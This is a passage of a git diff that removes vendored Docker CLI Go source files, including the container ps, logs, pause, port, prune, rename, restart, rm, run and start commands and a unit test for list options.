-// to set any list options that were not provided by flags (e.g. `.Size`). -// It is using a `map[string]bool` so that unknown fields passed into the -// template format do not cause errors. 
These errors will get picked up when -// running through the actual template processor. -type listOptionsProcessor map[string]bool - -// Size sets the size of the map when called by a template execution. -func (o listOptionsProcessor) Size() bool { - o["size"] = true - return true -} - -// Label is needed here as it allows the correct pre-processing -// because Label() is a method with arguments -func (o listOptionsProcessor) Label(name string) string { - return "" -} - -func buildContainerListOptions(opts *psOptions) (*types.ContainerListOptions, error) { - options := &types.ContainerListOptions{ - All: opts.all, - Limit: opts.last, - Size: opts.size, - Filters: opts.filter.Value(), - } - - if opts.nLatest && opts.last == -1 { - options.Limit = 1 - } - - tmpl, err := templates.Parse(opts.format) - - if err != nil { - return nil, err - } - - optionsProcessor := listOptionsProcessor{} - // This shouldn't error out but swallowing the error makes it harder - // to track down if preProcessor issues come up. 
Ref #24696 - if err := tmpl.Execute(ioutil.Discard, optionsProcessor); err != nil { - return nil, err - } - // At the moment all we need is to capture .Size for preprocessor - options.Size = opts.size || optionsProcessor["size"] - - return options, nil -} - -func runPs(dockerCli *command.DockerCli, opts *psOptions) error { - ctx := context.Background() - - listOptions, err := buildContainerListOptions(opts) - if err != nil { - return err - } - - containers, err := dockerCli.Client().ContainerList(ctx, *listOptions) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().PsFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().PsFormat - } else { - format = formatter.TableFormatKey - } - } - - containerCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewContainerFormat(format, opts.quiet, listOptions.Size), - Trunc: !opts.noTrunc, - } - return formatter.ContainerWrite(containerCtx, containers) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/logs.go b/vendor/github.com/docker/docker/cli/command/container/logs.go deleted file mode 100644 index 3a37cedf43..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/logs.go +++ /dev/null @@ -1,87 +0,0 @@ -package container - -import ( - "fmt" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stdcopy" - "github.com/spf13/cobra" -) - -var validDrivers = map[string]bool{ - "json-file": true, - "journald": true, -} - -type logsOptions struct { - follow bool - since string - timestamps bool - details bool - tail string - - container string -} - -// NewLogsCommand creates a new cobra.Command for `docker logs` -func NewLogsCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts logsOptions - - cmd := &cobra.Command{ - Use: "logs [OPTIONS] CONTAINER", - Short: 
"Fetch the logs of a container", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runLogs(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") - flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") - flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") - flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") - flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") - return cmd -} - -func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { - ctx := context.Background() - - c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) - if err != nil { - return err - } - - if !validDrivers[c.HostConfig.LogConfig.Type] { - return fmt.Errorf("\"logs\" command is supported only for \"json-file\" and \"journald\" logging drivers (got: %s)", c.HostConfig.LogConfig.Type) - } - - options := types.ContainerLogsOptions{ - ShowStdout: true, - ShowStderr: true, - Since: opts.since, - Timestamps: opts.timestamps, - Follow: opts.follow, - Tail: opts.tail, - Details: opts.details, - } - responseBody, err := dockerCli.Client().ContainerLogs(ctx, opts.container, options) - if err != nil { - return err - } - defer responseBody.Close() - - if c.Config.Tty { - _, err = io.Copy(dockerCli.Out(), responseBody) - } else { - _, err = stdcopy.StdCopy(dockerCli.Out(), dockerCli.Err(), responseBody) - } - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/container/pause.go b/vendor/github.com/docker/docker/cli/command/container/pause.go deleted file mode 100644 index 6817cf60eb..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/pause.go +++ /dev/null @@ -1,49 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - 
"github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type pauseOptions struct { - containers []string -} - -// NewPauseCommand creates a new cobra.Command for `docker pause` -func NewPauseCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pauseOptions - - return &cobra.Command{ - Use: "pause CONTAINER [CONTAINER...]", - Short: "Pause all processes within one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runPause(dockerCli, &opts) - }, - } -} - -func runPause(dockerCli *command.DockerCli, opts *pauseOptions) error { - ctx := context.Background() - - var errs []string - errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerPause) - for _, container := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/port.go b/vendor/github.com/docker/docker/cli/command/container/port.go deleted file mode 100644 index ea15290145..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/port.go +++ /dev/null @@ -1,78 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/go-connections/nat" - "github.com/spf13/cobra" -) - -type portOptions struct { - container string - - port string -} - -// NewPortCommand creates a new cobra.Command for `docker port` -func NewPortCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts portOptions - - cmd := &cobra.Command{ - Use: "port CONTAINER [PRIVATE_PORT[/PROTO]]", - Short: "List port mappings or a specific mapping for the container", - Args: cli.RequiresRangeArgs(1, 2), 
- RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - if len(args) > 1 { - opts.port = args[1] - } - return runPort(dockerCli, &opts) - }, - } - return cmd -} - -func runPort(dockerCli *command.DockerCli, opts *portOptions) error { - ctx := context.Background() - - c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) - if err != nil { - return err - } - - if opts.port != "" { - port := opts.port - proto := "tcp" - parts := strings.SplitN(port, "/", 2) - - if len(parts) == 2 && len(parts[1]) != 0 { - port = parts[0] - proto = parts[1] - } - natPort := port + "/" + proto - newP, err := nat.NewPort(proto, port) - if err != nil { - return err - } - if frontends, exists := c.NetworkSettings.Ports[newP]; exists && frontends != nil { - for _, frontend := range frontends { - fmt.Fprintf(dockerCli.Out(), "%s:%s\n", frontend.HostIP, frontend.HostPort) - } - return nil - } - return fmt.Errorf("Error: No public port '%s' published for %s", natPort, opts.container) - } - - for from, frontends := range c.NetworkSettings.Ports { - for _, frontend := range frontends { - fmt.Fprintf(dockerCli.Out(), "%s -> %s:%s\n", from, frontend.HostIP, frontend.HostPort) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/prune.go b/vendor/github.com/docker/docker/cli/command/container/prune.go deleted file mode 100644 index 064f4c08e0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/prune.go +++ /dev/null @@ -1,75 +0,0 @@ -package container - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool -} - -// NewPruneCommand returns a new cobra prune command for containers -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - 
cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove all stopped containers", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - spaceReclaimed, output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - - return cmd -} - -const warning = `WARNING! This will remove all stopped containers. -Are you sure you want to continue?` - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().ContainersPrune(context.Background(), filters.Args{}) - if err != nil { - return - } - - if len(report.ContainersDeleted) > 0 { - output = "Deleted Containers:\n" - for _, id := range report.ContainersDeleted { - output += id + "\n" - } - spaceReclaimed = report.SpaceReclaimed - } - - return -} - -// RunPrune calls the Container Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return runPrune(dockerCli, pruneOptions{force: true}) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/ps_test.go b/vendor/github.com/docker/docker/cli/command/container/ps_test.go deleted file mode 100644 index 62b0545274..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/ps_test.go +++ /dev/null @@ -1,118 +0,0 @@ -package container - -import ( - "testing" - - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/testutil/assert" -) - -func 
TestBuildContainerListOptions(t *testing.T) { - filters := opts.NewFilterOpt() - assert.NilError(t, filters.Set("foo=bar")) - assert.NilError(t, filters.Set("baz=foo")) - - contexts := []struct { - psOpts *psOptions - expectedAll bool - expectedSize bool - expectedLimit int - expectedFilters map[string]string - }{ - { - psOpts: &psOptions{ - all: true, - size: true, - last: 5, - filter: filters, - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - { - psOpts: &psOptions{ - all: true, - size: true, - last: -1, - nLatest: true, - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 1, - expectedFilters: make(map[string]string), - }, - { - psOpts: &psOptions{ - all: true, - size: false, - last: 5, - filter: filters, - // With .Size, size should be true - format: "{{.Size}}", - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - { - psOpts: &psOptions{ - all: true, - size: false, - last: 5, - filter: filters, - // With .Size, size should be true - format: "{{.Size}} {{.CreatedAt}} {{.Networks}}", - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - { - psOpts: &psOptions{ - all: true, - size: false, - last: 5, - filter: filters, - // Without .Size, size should be false - format: "{{.CreatedAt}} {{.Networks}}", - }, - expectedAll: true, - expectedSize: false, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - } - - for _, c := range contexts { - options, err := buildContainerListOptions(c.psOpts) - assert.NilError(t, err) - - assert.Equal(t, c.expectedAll, options.All) - assert.Equal(t, c.expectedSize, options.Size) - assert.Equal(t, c.expectedLimit, options.Limit) - assert.Equal(t, options.Filters.Len(), 
len(c.expectedFilters)) - - for k, v := range c.expectedFilters { - f := options.Filters - if !f.ExactMatch(k, v) { - t.Fatalf("Expected filter with key %s to be %s but got %s", k, v, f.Get(k)) - } - } - } -} diff --git a/vendor/github.com/docker/docker/cli/command/container/rename.go b/vendor/github.com/docker/docker/cli/command/container/rename.go deleted file mode 100644 index 346fb7b3b9..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/rename.go +++ /dev/null @@ -1,51 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type renameOptions struct { - oldName string - newName string -} - -// NewRenameCommand creates a new cobra.Command for `docker rename` -func NewRenameCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts renameOptions - - cmd := &cobra.Command{ - Use: "rename CONTAINER NEW_NAME", - Short: "Rename a container", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.oldName = args[0] - opts.newName = args[1] - return runRename(dockerCli, &opts) - }, - } - return cmd -} - -func runRename(dockerCli *command.DockerCli, opts *renameOptions) error { - ctx := context.Background() - - oldName := strings.TrimSpace(opts.oldName) - newName := strings.TrimSpace(opts.newName) - - if oldName == "" || newName == "" { - return fmt.Errorf("Error: Neither old nor new names may be empty") - } - - if err := dockerCli.Client().ContainerRename(ctx, oldName, newName); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - return fmt.Errorf("Error: failed to rename container named %s", oldName) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/restart.go b/vendor/github.com/docker/docker/cli/command/container/restart.go deleted file mode 100644 index fc3ba93c84..0000000000 --- 
a/vendor/github.com/docker/docker/cli/command/container/restart.go +++ /dev/null @@ -1,62 +0,0 @@ -package container - -import ( - "fmt" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type restartOptions struct { - nSeconds int - nSecondsChanged bool - - containers []string -} - -// NewRestartCommand creates a new cobra.Command for `docker restart` -func NewRestartCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts restartOptions - - cmd := &cobra.Command{ - Use: "restart [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Restart one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - opts.nSecondsChanged = cmd.Flags().Changed("time") - return runRestart(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.IntVarP(&opts.nSeconds, "time", "t", 10, "Seconds to wait for stop before killing the container") - return cmd -} - -func runRestart(dockerCli *command.DockerCli, opts *restartOptions) error { - ctx := context.Background() - var errs []string - var timeout *time.Duration - if opts.nSecondsChanged { - timeoutValue := time.Duration(opts.nSeconds) * time.Second - timeout = &timeoutValue - } - - for _, name := range opts.containers { - if err := dockerCli.Client().ContainerRestart(ctx, name, timeout); err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/rm.go b/vendor/github.com/docker/docker/cli/command/container/rm.go deleted file mode 100644 index 60724f194b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/rm.go +++ /dev/null @@ -1,73 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - 
"golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type rmOptions struct { - rmVolumes bool - rmLink bool - force bool - - containers []string -} - -// NewRmCommand creates a new cobra.Command for `docker rm` -func NewRmCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts rmOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Remove one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runRm(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.rmVolumes, "volumes", "v", false, "Remove the volumes associated with the container") - flags.BoolVarP(&opts.rmLink, "link", "l", false, "Remove the specified link") - flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of a running container (uses SIGKILL)") - return cmd -} - -func runRm(dockerCli *command.DockerCli, opts *rmOptions) error { - ctx := context.Background() - - var errs []string - options := types.ContainerRemoveOptions{ - RemoveVolumes: opts.rmVolumes, - RemoveLinks: opts.rmLink, - Force: opts.force, - } - - errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { - if container == "" { - return fmt.Errorf("Container name cannot be empty") - } - container = strings.Trim(container, "/") - return dockerCli.Client().ContainerRemove(ctx, container, options) - }) - - for _, name := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/run.go b/vendor/github.com/docker/docker/cli/command/container/run.go 
deleted file mode 100644 index 0fad93e688..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/run.go +++ /dev/null @@ -1,285 +0,0 @@ -package container - -import ( - "fmt" - "io" - "net/http/httputil" - "os" - "runtime" - "strings" - "syscall" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - opttypes "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/promise" - "github.com/docker/docker/pkg/signal" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/libnetwork/resolvconf/dns" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -type runOptions struct { - detach bool - sigProxy bool - name string - detachKeys string -} - -// NewRunCommand create a new `docker run` command -func NewRunCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts runOptions - var copts *runconfigopts.ContainerOptions - - cmd := &cobra.Command{ - Use: "run [OPTIONS] IMAGE [COMMAND] [ARG...]", - Short: "Run a command in a new container", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - copts.Image = args[0] - if len(args) > 1 { - copts.Args = args[1:] - } - return runRun(dockerCli, cmd.Flags(), &opts, copts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - // These are flags not stored in Config/HostConfig - flags.BoolVarP(&opts.detach, "detach", "d", false, "Run container in background and print container ID") - flags.BoolVar(&opts.sigProxy, "sig-proxy", true, "Proxy received signals to the process") - flags.StringVar(&opts.name, "name", "", "Assign a name to the container") - flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") - - // Add an explicit help that doesn't have a `-h` to prevent the conflict - // with hostname - flags.Bool("help", false, "Print usage") - - 
command.AddTrustedFlags(flags, true) - copts = runconfigopts.AddFlags(flags) - return cmd -} - -func runRun(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *runOptions, copts *runconfigopts.ContainerOptions) error { - stdout, stderr, stdin := dockerCli.Out(), dockerCli.Err(), dockerCli.In() - client := dockerCli.Client() - // TODO: pass this as an argument - cmdPath := "run" - - var ( - flAttach *opttypes.ListOpts - ErrConflictAttachDetach = fmt.Errorf("Conflicting options: -a and -d") - ErrConflictRestartPolicyAndAutoRemove = fmt.Errorf("Conflicting options: --restart and --rm") - ) - - config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) - - // just in case the Parse does not exit - if err != nil { - reportError(stderr, cmdPath, err.Error(), true) - return cli.StatusError{StatusCode: 125} - } - - if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { - return ErrConflictRestartPolicyAndAutoRemove - } - if hostConfig.OomKillDisable != nil && *hostConfig.OomKillDisable && hostConfig.Memory == 0 { - fmt.Fprintf(stderr, "WARNING: Disabling the OOM killer on containers without setting a '-m/--memory' limit may be dangerous.\n") - } - - if len(hostConfig.DNS) > 0 { - // check the DNS settings passed via --dns against - // localhost regexp to warn if they are trying to - // set a DNS to a localhost address - for _, dnsIP := range hostConfig.DNS { - if dns.IsLocalhost(dnsIP) { - fmt.Fprintf(stderr, "WARNING: Localhost DNS setting (--dns=%s) may fail in containers.\n", dnsIP) - break - } - } - } - - config.ArgsEscaped = false - - if !opts.detach { - if err := dockerCli.In().CheckTty(config.AttachStdin, config.Tty); err != nil { - return err - } - } else { - if fl := flags.Lookup("attach"); fl != nil { - flAttach = fl.Value.(*opttypes.ListOpts) - if flAttach.Len() != 0 { - return ErrConflictAttachDetach - } - } - - config.AttachStdin = false - config.AttachStdout = false - config.AttachStderr = false - config.StdinOnce = false - 
} - - // Disable sigProxy when in TTY mode - if config.Tty { - opts.sigProxy = false - } - - // Telling the Windows daemon the initial size of the tty during start makes - // a far better user experience rather than relying on subsequent resizes - // to cause things to catch up. - if runtime.GOOS == "windows" { - hostConfig.ConsoleSize[0], hostConfig.ConsoleSize[1] = dockerCli.Out().GetTtySize() - } - - ctx, cancelFun := context.WithCancel(context.Background()) - - createResponse, err := createContainer(ctx, dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) - if err != nil { - reportError(stderr, cmdPath, err.Error(), true) - return runStartContainerErr(err) - } - if opts.sigProxy { - sigc := ForwardAllSignals(ctx, dockerCli, createResponse.ID) - defer signal.StopCatch(sigc) - } - var ( - waitDisplayID chan struct{} - errCh chan error - ) - if !config.AttachStdout && !config.AttachStderr { - // Make this asynchronous to allow the client to write to stdin before having to read the ID - waitDisplayID = make(chan struct{}) - go func() { - defer close(waitDisplayID) - fmt.Fprintf(stdout, "%s\n", createResponse.ID) - }() - } - attach := config.AttachStdin || config.AttachStdout || config.AttachStderr - if attach { - var ( - out, cerr io.Writer - in io.ReadCloser - ) - if config.AttachStdin { - in = stdin - } - if config.AttachStdout { - out = stdout - } - if config.AttachStderr { - if config.Tty { - cerr = stdout - } else { - cerr = stderr - } - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - options := types.ContainerAttachOptions{ - Stream: true, - Stdin: config.AttachStdin, - Stdout: config.AttachStdout, - Stderr: config.AttachStderr, - DetachKeys: dockerCli.ConfigFile().DetachKeys, - } - - resp, errAttach := client.ContainerAttach(ctx, createResponse.ID, options) - if errAttach != nil && errAttach != httputil.ErrPersistEOF { - // ContainerAttach returns an ErrPersistEOF (connection 
closed) - // means server met an error and put it in Hijacked connection - // keep the error and read detailed error message from hijacked connection later - return errAttach - } - defer resp.Close() - - errCh = promise.Go(func() error { - errHijack := holdHijackedConnection(ctx, dockerCli, config.Tty, in, out, cerr, resp) - if errHijack == nil { - return errAttach - } - return errHijack - }) - } - - statusChan := waitExitOrRemoved(ctx, dockerCli, createResponse.ID, hostConfig.AutoRemove) - - //start the container - if err := client.ContainerStart(ctx, createResponse.ID, types.ContainerStartOptions{}); err != nil { - // If we have holdHijackedConnection, we should notify - // holdHijackedConnection we are going to exit and wait - // to avoid the terminal are not restored. - if attach { - cancelFun() - <-errCh - } - - reportError(stderr, cmdPath, err.Error(), false) - if hostConfig.AutoRemove { - // wait container to be removed - <-statusChan - } - return runStartContainerErr(err) - } - - if (config.AttachStdin || config.AttachStdout || config.AttachStderr) && config.Tty && dockerCli.Out().IsTerminal() { - if err := MonitorTtySize(ctx, dockerCli, createResponse.ID, false); err != nil { - fmt.Fprintf(stderr, "Error monitoring TTY size: %s\n", err) - } - } - - if errCh != nil { - if err := <-errCh; err != nil { - logrus.Debugf("Error hijack: %s", err) - return err - } - } - - // Detached mode: wait for the id to be displayed and return. 
- if !config.AttachStdout && !config.AttachStderr { - // Detached mode - <-waitDisplayID - return nil - } - - status := <-statusChan - if status != 0 { - return cli.StatusError{StatusCode: status} - } - return nil -} - -// reportError is a utility method that prints a user-friendly message -// containing the error that occurred during parsing and a suggestion to get help -func reportError(stderr io.Writer, name string, str string, withHelp bool) { - if withHelp { - str += ".\nSee '" + os.Args[0] + " " + name + " --help'" - } - fmt.Fprintf(stderr, "%s: %s.\n", os.Args[0], str) -} - -// if container start fails with 'not found'/'no such' error, return 127 -// if container start fails with 'permission denied' error, return 126 -// return 125 for generic docker daemon failures -func runStartContainerErr(err error) error { - trimmedErr := strings.TrimPrefix(err.Error(), "Error response from daemon: ") - statusError := cli.StatusError{StatusCode: 125} - if strings.Contains(trimmedErr, "executable file not found") || - strings.Contains(trimmedErr, "no such file or directory") || - strings.Contains(trimmedErr, "system cannot find the file specified") { - statusError = cli.StatusError{StatusCode: 127} - } else if strings.Contains(trimmedErr, syscall.EACCES.Error()) { - statusError = cli.StatusError{StatusCode: 126} - } - - return statusError -} diff --git a/vendor/github.com/docker/docker/cli/command/container/start.go b/vendor/github.com/docker/docker/cli/command/container/start.go deleted file mode 100644 index 3521a41949..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/start.go +++ /dev/null @@ -1,179 +0,0 @@ -package container - -import ( - "fmt" - "io" - "net/http/httputil" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/promise" - "github.com/docker/docker/pkg/signal" - "github.com/spf13/cobra" -) - -type 
startOptions struct { - attach bool - openStdin bool - detachKeys string - checkpoint string - checkpointDir string - - containers []string -} - -// NewStartCommand creates a new cobra.Command for `docker start` -func NewStartCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts startOptions - - cmd := &cobra.Command{ - Use: "start [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Start one or more stopped containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runStart(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.attach, "attach", "a", false, "Attach STDOUT/STDERR and forward signals") - flags.BoolVarP(&opts.openStdin, "interactive", "i", false, "Attach container's STDIN") - flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") - - flags.StringVar(&opts.checkpoint, "checkpoint", "", "Restore from this checkpoint") - flags.SetAnnotation("checkpoint", "experimental", nil) - flags.StringVar(&opts.checkpointDir, "checkpoint-dir", "", "Use a custom checkpoint storage directory") - flags.SetAnnotation("checkpoint-dir", "experimental", nil) - return cmd -} - -func runStart(dockerCli *command.DockerCli, opts *startOptions) error { - ctx, cancelFun := context.WithCancel(context.Background()) - - if opts.attach || opts.openStdin { - // We're going to attach to a container. - // 1. Ensure we only have one container. - if len(opts.containers) > 1 { - return fmt.Errorf("You cannot start and attach multiple containers at once.") - } - - // 2. Attach to the container. 
- container := opts.containers[0] - c, err := dockerCli.Client().ContainerInspect(ctx, container) - if err != nil { - return err - } - - // We always use c.ID instead of container to maintain consistency during `docker start` - if !c.Config.Tty { - sigc := ForwardAllSignals(ctx, dockerCli, c.ID) - defer signal.StopCatch(sigc) - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - options := types.ContainerAttachOptions{ - Stream: true, - Stdin: opts.openStdin && c.Config.OpenStdin, - Stdout: true, - Stderr: true, - DetachKeys: dockerCli.ConfigFile().DetachKeys, - } - - var in io.ReadCloser - - if options.Stdin { - in = dockerCli.In() - } - - resp, errAttach := dockerCli.Client().ContainerAttach(ctx, c.ID, options) - if errAttach != nil && errAttach != httputil.ErrPersistEOF { - // ContainerAttach return an ErrPersistEOF (connection closed) - // means server met an error and already put it in Hijacked connection, - // we would keep the error and read the detailed error message from hijacked connection - return errAttach - } - defer resp.Close() - cErr := promise.Go(func() error { - errHijack := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp) - if errHijack == nil { - return errAttach - } - return errHijack - }) - - // 3. We should open a channel for receiving status code of the container - // no matter it's detached, removed on daemon side(--rm) or exit normally. - statusChan := waitExitOrRemoved(ctx, dockerCli, c.ID, c.HostConfig.AutoRemove) - startOptions := types.ContainerStartOptions{ - CheckpointID: opts.checkpoint, - CheckpointDir: opts.checkpointDir, - } - - // 4. Start the container. - if err := dockerCli.Client().ContainerStart(ctx, c.ID, startOptions); err != nil { - cancelFun() - <-cErr - if c.HostConfig.AutoRemove { - // wait container to be removed - <-statusChan - } - return err - } - - // 5. Wait for attachment to break. 
- if c.Config.Tty && dockerCli.Out().IsTerminal() { - if err := MonitorTtySize(ctx, dockerCli, c.ID, false); err != nil { - fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) - } - } - if attchErr := <-cErr; attchErr != nil { - return attchErr - } - - if status := <-statusChan; status != 0 { - return cli.StatusError{StatusCode: status} - } - } else if opts.checkpoint != "" { - if len(opts.containers) > 1 { - return fmt.Errorf("You cannot restore multiple containers at once.") - } - container := opts.containers[0] - startOptions := types.ContainerStartOptions{ - CheckpointID: opts.checkpoint, - CheckpointDir: opts.checkpointDir, - } - return dockerCli.Client().ContainerStart(ctx, container, startOptions) - - } else { - // We're not going to attach to anything. - // Start as many containers as we want. - return startContainersWithoutAttachments(ctx, dockerCli, opts.containers) - } - - return nil -} - -func startContainersWithoutAttachments(ctx context.Context, dockerCli *command.DockerCli, containers []string) error { - var failedContainers []string - for _, container := range containers { - if err := dockerCli.Client().ContainerStart(ctx, container, types.ContainerStartOptions{}); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - failedContainers = append(failedContainers, container) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - - if len(failedContainers) > 0 { - return fmt.Errorf("Error: failed to start containers: %v", strings.Join(failedContainers, ", ")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats.go b/vendor/github.com/docker/docker/cli/command/container/stats.go deleted file mode 100644 index 12d5c68522..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/stats.go +++ /dev/null @@ -1,243 +0,0 @@ -package container - -import ( - "fmt" - "io" - "strings" - "sync" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - 
